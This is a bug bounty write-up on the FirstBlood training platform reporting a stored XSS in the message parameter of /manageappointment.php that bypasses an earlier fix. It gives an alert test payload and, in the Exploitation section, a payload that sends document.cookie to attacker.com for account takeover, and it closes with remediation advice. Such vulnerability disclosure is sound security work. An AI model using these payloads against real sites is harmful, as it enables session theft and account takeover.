FirstBlood-#401Stored XSS on /manageappointment.php using the message parameter [Bypass]
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-25, holybugx Level 5 reported:

Description

Hello Sean,

When users cancel their appointments they can leave a message for the doctor. Proper sanitization is not implemented in place which makes Stored XSS possible on this endpoint. This vulnerability leads to a one-click account takeover.

The developer tried to fix the other vulnerability on this endpoint. However, it wasn't properly patched which results in another Stored-XSS on the /manageappointment.php endpoint.

The reflection context changes from <textarea> to JavaScript variable, and several special characters such as < > are filtered. However, as the reflection context is inside the JavaScript variable, it is possible to break out of the syntax using the ' character and input the XSS payload.

Steps To Reproduce

  1. Make an appointment using the /book-appointment.html endpoint:

You will be given an appointment ID, that you can further use to check your appointment:

  1. Use your appointment ID on the /yourappointments.php endpoint and Intercept the request to Modify Appointments.
  • Use '-alert(document.cookie)-' as the value of the message parameter:

  1. Revisit the /yourappointments.php endpoint using your appointment ID, and XSS executes:

Exploitation

To further exploit this XSS, an attacker can craft a payload to steal the victim's cookies, which leads to account takeover:

';let%20img%3ddocument.createElement('img');img.src='//attacker.com/'%2bdocument.cookie;document.body.appendChild(img);let%20a='
  • Here is the /manageappointment.php source code after the injection:

  • After the victim opens the malicious URL, his cookies will be sent to the attacker's server without him realizing it.

Impact

  • XSS leading to one-click account takeover.

Remediation

  • Implement proper sanitization on the message parameter.
  • Filtering/Escaping various special characters e.g. < " ' >
  • Set httponly cookies so that javascript can not access the cookies.
  • Remove/Expire the drps cookies after logging out.

Kind Regards,

HolyBugx

P2 High

Endpoint: /manageappointment.php

Parameter: message

Payload: '-alert(document.cookie)-'


FirstBlood ID: 22
Vulnerability Type: Stored XSS

Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues such as when creating and editing and not just when cancelling the appointment. Making use of htmlentities() and relying on .value() in javascript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also results in it being vulnerable to admins on cancelled appointments as well.